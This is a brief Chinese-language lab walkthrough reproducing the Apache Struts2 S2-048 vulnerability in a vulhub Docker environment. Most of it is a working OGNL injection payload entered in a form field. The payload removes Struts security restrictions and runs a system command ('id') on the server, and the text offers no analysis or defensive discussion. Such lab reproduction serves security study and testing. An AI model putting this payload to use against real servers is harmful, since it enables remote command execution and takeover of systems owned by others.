環境: vulhub
環境搭建
進入s2-048目錄

切換root用戶
![]()
啟動漏洞環境 docker-compose up -d
![]()
漏洞復現
瀏覽器訪問 showcase


Gangster Name輸入 ${233*233} , 其余隨便填


將Gangster Name輸入一下payload , 其余隨便填
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}


轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289488.html
標籤:其他
